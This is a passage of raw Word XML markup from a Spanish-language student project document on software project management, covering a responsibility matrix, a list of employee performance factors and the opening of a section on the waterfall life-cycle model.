        <w:t xml:space="preserve"> Aquellos que se mantienen al día sobre los progresos, a menudo sólo cuando la tarea se termina o entrega, o que reciben las salidas de un proceso y con el que sólo hay una vía de comunicación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593527" w:rsidRDefault="007C5684" w:rsidP="00B95CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>310202</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>73025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4921885" cy="2392045"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>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921885" cy="23920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93527" w:rsidRDefault="00593527" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B638FE" w:rsidRDefault="00B638FE" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B638FE" w:rsidRDefault="00B638FE" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B638FE" w:rsidRDefault="00B638FE" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00593527" w:rsidRDefault="00593527" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00593527" w:rsidRDefault="00593527" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="007C5684" w:rsidRDefault="007C5684" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="007C5684" w:rsidRDefault="007C5684" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="007C5684" w:rsidRDefault="007C5684" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="007C5684" w:rsidRDefault="007C5684" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00D24EDA" w:rsidRDefault="00D24EDA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00D24EDA" w:rsidRDefault="00D24EDA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00D24EDA" w:rsidRDefault="00D24EDA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00D24EDA" w:rsidRDefault="00D24EDA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00D24EDA" w:rsidRDefault="00D24EDA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00D24EDA" w:rsidRDefault="00D24EDA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00D24EDA" w:rsidRDefault="00D24EDA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00C7006E" w:rsidRDefault="00D24EDA" w:rsidP="00C7006E">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C7006E" w:rsidRPr="00C7006E">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Importancia</w:t>
      </w:r>
      <w:r w:rsidR="00D120D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D24EDA" w:rsidRPr="00C7006E" w:rsidRDefault="00D24EDA" w:rsidP="00C7006E">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C7006E" w:rsidRPr="00C7006E" w:rsidRDefault="00C7006E" w:rsidP="00C7006E">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C7006E">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Toda la información que se registra durante el transcurso del proyecto es importante, ya que al administrar esta información puedes utilizarla en problemas del proyecto o en futuros proyectos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5684" w:rsidRDefault="00C7006E" w:rsidP="00C7006E">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C7006E">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La matriz de responsabilidad es muy importante para el inicio de proyecto y para el transcurso del mismo, ye se encuentran las actividades a realizar, quien las va a realizar, quien es el que la autorizo, quien la revisara y a quién hay que consultar para esa actividad, esta información es uy importante ya que como lo dije anteriormente te indica quienes son los involucrados en las tareas ara una actividad del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5684" w:rsidRDefault="007C5684" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="007C5684" w:rsidRPr="00977053" w:rsidRDefault="007C5684" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc514520855"/>
      <w:r w:rsidRPr="00977053">
        <w:t>Lista de factores de desempeño</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00052CE9" w:rsidRDefault="00052CE9" w:rsidP="00052CE9"/>
    <w:p w:rsidR="007933F7" w:rsidRDefault="007933F7" w:rsidP="00052CE9"/>
    <w:p w:rsidR="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El desempeño laboral es la forma en que los empleados realizan su trabajo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Éste se evalúa durante las revisiones de su rendimiento, mediante las cuales un empleador tiene en cuenta factores como la capacidad de liderazgo, la gestión del tiempo, las habilidades organizativas y la productividad para analizar cada empleado de forma individual. Las revisiones del rendimiento laboral por lo general se llevan a cabo anualmente y pueden determinar que se eleve la elegibilidad de un empleado, decidir si es apto para ser promovido o incluso si debiera ser despedido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Existen muchos factores a tener en cuenta para la evaluación del desempeño de los colaboradores, dependiendo del método de evaluación que se emplee, pero por lo general estos factores son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Calidad de trabajo:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se refiere al desarrollo de las actividades sin errores, a la fabricación de productos o prestación de servicios de acuerdo a los estándares requeridos por el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cantidad de trabajo:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se refiere a la cantidad de trabajo que se puede medir según el área y el tipo de actividad que desarrolla, por ejemplo, productos elaborados sin defectos, tiempo empleado en el diseño de un nuevo producto, ventas cerradas, monto de cobranzas efectuadas, niveles de rentabilidad o productividad, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conocimiento del puesto:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mide el grado de conocimiento y entendimiento del trabajo. Abarca los principios, los conceptos, las técnicas, etc., así como las destrezas para ejecutarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Iniciativa:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Actúa sin necesidad de indicársele. Es eficaz al afrontar situaciones y problemas infrecuentes, tiene nuevas ideas, inicia la acción y muestra originalidad a la hora de hacer frente y manejar situaciones de trabajo. Puede trabajar independientemente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Innovación y creatividad:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Es el grado en que va por delante de las tendencias, avizora la evolución del mercado, desarrollo nuevos productos, hace innovaciones de proceso, del producto y/o nuevas ideas en el campo que pueden mejorar la capacidad de la planta o mejorar los niveles de productividad, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relaciones con los compañeros:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Es la cualidad de mantener adecuadas relaciones con subordinados, superiores y compañeros, o clientes internos y externos, el grado para fomentar la participación e integración del personal. También se le llama relaciones interpersonales o humanas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Liderazgo:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Es la dirección y desarrollo de los subordinados, el tipo de autoridad que ejerce y los objetivos que logra con su equipo de trabajo, la forma como asigna las tareas, motiva al personal y alcanza los resultados, etc. Asimismo, su sensibilidad o indiferencia a los problemas de los empleados y el interés de encontrar soluciones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Responsabilidades:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Es el compromiso que muestra con sus obligaciones, el grado de cumplimiento con sus tareas, si asume sus obligaciones, actúa </w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>en todo momento a favor de la empresa. Mantiene bien cuidado los bienes, enseres, dinero a su cargo y controla al personal a su cargo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="007933F7" w:rsidP="007933F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Puntualidad:</w:t>
      </w:r>
      <w:r w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evalúa la exactitud con que cumple los plazos de entrega de los lotes de producción o las horas de llegada y salida dentro del horario de trabajo, así como su índice de asistencia e inasistencia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRDefault="00C77BEA" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>706764</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>361950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4353533" cy="2591162"/>
            <wp:effectExtent l="0" t="0" r="9525"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7D8D6A1.tmp"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4353533" cy="2591162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F3F7F" w:rsidRDefault="009F3F7F" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3F7F" w:rsidRDefault="009F3F7F" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3F7F" w:rsidRDefault="009F3F7F" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3F7F" w:rsidRDefault="009F3F7F" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C77BEA" w:rsidRDefault="00C77BEA" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C77BEA" w:rsidRDefault="00C77BEA" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C77BEA" w:rsidRPr="007933F7" w:rsidRDefault="00C77BEA" w:rsidP="007933F7">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRPr="007933F7" w:rsidRDefault="0027476C" w:rsidP="0027476C">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D120D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Importancia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027476C" w:rsidRDefault="0027476C" w:rsidP="0027476C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRDefault="0027476C" w:rsidP="0027476C">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007933F7" w:rsidRPr="007933F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al realizar la investigación de los factores de desempeño dentro de los integrantes de un equipo de desarrollo o de cualquier otra actividad en equipos, se dan a conocer información sobre los integrantes del equipo, que ayudan o perjudican al proyecto, de esta manera pensamos que conocer esta información es muy importante ya que con ella puedes apoyar a tus compañeros de equipo de una mejor forma, lo cual beneficiara al equipo durante el transcurso del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007933F7" w:rsidRDefault="007933F7" w:rsidP="00052CE9"/>
    <w:p w:rsidR="007933F7" w:rsidRPr="00052CE9" w:rsidRDefault="007933F7" w:rsidP="00052CE9"/>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00C77BEA" w:rsidRDefault="00C77BEA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00C77BEA" w:rsidRDefault="00C77BEA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00C77BEA" w:rsidRDefault="00C77BEA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00C77BEA" w:rsidRDefault="00C77BEA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00C77BEA" w:rsidRPr="00977053" w:rsidRDefault="00C77BEA" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc514520856"/>
      <w:r w:rsidRPr="00977053">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
        </w:rPr>
        <w:t>Esquema del ciclo de vida</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>El modelo en cascada es un proceso de desarrollo secuencial, en el que el desarrollo de software se concibe como un conjunto de etapas que se ejecutan una tras otra. Se le denomina así por las posiciones que ocupan las diferentes fases que componen el proyecto, colocadas una encima de otra, y siguiendo un flujo de ejecución de arriba hacia abajo, como una cascada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
